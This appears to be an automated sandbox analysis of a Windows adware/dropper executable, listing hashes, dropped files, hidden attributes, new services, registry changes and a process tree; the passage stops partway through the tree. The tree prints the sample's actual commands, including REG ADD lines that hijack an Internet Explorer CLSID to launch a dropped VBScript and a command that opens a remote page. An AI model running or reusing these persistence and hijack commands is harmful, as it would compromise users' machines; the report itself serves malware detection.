40a2e0f00ccf67a73b04807f991c1d3e503a6680ea5580410b489dbe2daf8c2b

Analysis

max time kernel
149s
max time network
146s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
30/12/2023, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0ca461ccc043c477bbd01eb56c5a278e.exe
Size

356KB
MD5

0ca461ccc043c477bbd01eb56c5a278e
SHA1

3931aee44b284b6175bde640e3297f00db12c011
SHA256

40a2e0f00ccf67a73b04807f991c1d3e503a6680ea5580410b489dbe2daf8c2b
SHA512

d1e4636a67f01ed4b98a82afa425b4cd883a28b5ebf100d6eb41a42bea9500362e1dddaad2b8f7642b995240b77bfedd522dd3d779459ed4dd9a2d3af4b91f42
SSDEEP

6144:Fu2urzh9xu/XkauF5JgrFuaufWG7JbOB4Dklhd8r3AXX2z+2FB8+iTJiPUbVxXRQ:Futrzh9xOXkWrJufWG7KlaAnUfiTJSS0

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
840	attrib.exe
1920	attrib.exe
3004	attrib.exe
788	attrib.exe
1896	attrib.exe
1260	attrib.exe
484	attrib.exe

Executes dropped EXE 3 IoCs

pid	Process
2392	msn2.exe
1416	ks.exe
2576	ks.exe

Loads dropped DLL 5 IoCs

pid	Process
2452	cmd.exe
2392	msn2.exe
2392	msn2.exe
2392	msn2.exe
2392	msn2.exe

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File created	C:\Program Files\software\fav\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\software\361.cmd	attrib.exe
File opened for modification	C:\Program Files\software\tool.cmd	cmd.exe
File created	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	attrib.exe
File opened for modification	C:\Program Files\software\360SE.vbs	attrib.exe
File created	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File created	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File created	C:\Program Files\software\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\software\360.cmd	cmd.exe
File created	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	cmd.exe
File created	C:\Program Files\software\software.vbs	cmd.exe
File created	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File created	C:\Program Files\software\360SE.vbs	cmd.exe
File created	C:\Program Files\software\360.cmd	cmd.exe
File opened for modification	C:\Program Files\software\360SE.vbs	cmd.exe
File created	C:\Program Files\software\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	attrib.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File opened for modification	C:\Program Files\software\fav\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\software.vbs	cmd.exe
File created	C:\Program Files\software\fav\fav.cmd	cmd.exe
File opened for modification	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\360.cmd	attrib.exe
File opened for modification	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	attrib.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1052	sc.exe
2044	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{31BEF0F1-A741-11EE-9075-EED0D7A1BF98} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0b14c094e3bda01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0720b1d8642c344adb870a2e91786640000000002000000000010660000000100002000000071ee6abb992fa76ab4af3817d42f4220f7742063ba74471a98cfc1d8b35b8b9a000000000e8000000002000020000000154bcff3ee0a8e7aee32bc10a496afe3cac024bb0ec4a1945233be49cc6ccfd320000000524bea5ad341394d80f10e27eda45f0b2d416046fadfd1a52f9e98295937e29440000000639be563a123a0f963f8c12f05dc4dc398abedec0a48d414c365352b15ea543627a690e1c270373c6c8422b9996bd05d21bfca399ed5ffeb38706a0bc1bfcf01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0720b1d8642c344adb870a2e91786640000000002000000000010660000000100002000000074b085b5b1adf376b24cc418113fcd0b5c2a115e4ac6f5629dda271daa39582a000000000e8000000002000020000000654a764275d6034316812339bbd2148df19e5a5b0bfe19e25da1e1bec03adac290000000ff0518682119e2168912f08598daa94d8b41cf6bda8f74eed215acfcf25dc0095cf20683a41906dd480095001272227e3f356a78bd33f5f802ad5e41a5883936352cff7ec917f929e22a4c6c786f7c12e17d4eb09b65bc8fbcedb17cf229cdcf254d188d06abf3bed83c11b15bee79dd2063446c55697b561b07efa682227cf22936d760dd505655274f300b16e9252140000000afecbc7689598dad180e29a00585a54d0d92bd9e425ab45c3e0e662567030f2cefc8581e263585f25c589636c6eb7a2b291b7878e7addc7e68f1c4bb330fa6d1	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "410122769"	iexplore.exe

Modifies registry class 40 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideOnDesktopPerUser	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\software\\Microsoft\\win.vbs"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\WantsParsDisplayName	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideFolderVerbs	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1220	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1220	iexplore.exe
1220	iexplore.exe
2888	IEXPLORE.EXE
2888	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2228 wrote to memory of 2820	2228	0ca461ccc043c477bbd01eb56c5a278e.exe	28
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2820 wrote to memory of 2568	2820	WScript.exe	29
PID 2568 wrote to memory of 1220	2568	cmd.exe	31
PID 2568 wrote to memory of 1220	2568	cmd.exe	31
PID 2568 wrote to memory of 1220	2568	cmd.exe	31
PID 2568 wrote to memory of 1220	2568	cmd.exe	31
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 2820 wrote to memory of 1580	2820	WScript.exe	32
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1220 wrote to memory of 2888	1220	iexplore.exe	34
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 2884	1580	cmd.exe	35
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 828	1580	cmd.exe	36
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 1356	1580	cmd.exe	37
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 288	1580	cmd.exe	38
PID 1580 wrote to memory of 1600	1580	cmd.exe	39
PID 1580 wrote to memory of 1600	1580	cmd.exe	39
PID 1580 wrote to memory of 1600	1580	cmd.exe	39
PID 1580 wrote to memory of 1600	1580	cmd.exe	39

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1896	attrib.exe
1260	attrib.exe
484	attrib.exe
840	attrib.exe
1920	attrib.exe
3004	attrib.exe
788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0ca461ccc043c477bbd01eb56c5a278e.exe
"C:\Users\Admin\AppData\Local\Temp\0ca461ccc043c477bbd01eb56c5a278e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_ok.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.4555.net/index2.html?ok
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.4555.net/index2.html?ok
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1220 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      Modifies registry class
      PID:828
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      Modifies registry class
      PID:1356
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      Modifies registry class
      PID:288
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:1600
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:2172
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32"
      4⤵
      Modifies registry class
      PID:1556
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:2412
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:1248
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell"
      4⤵
      Modifies registry class
      PID:2428
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:340
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1592
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:1664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:1568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\software\Microsoft\win.vbs" /f
      4⤵
      Modifies registry class
      PID:268
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:764
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:528
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder"
      4⤵
      PID:296
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:2576
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1844
  - - C:\Windows\SysWOW64\reg.exe
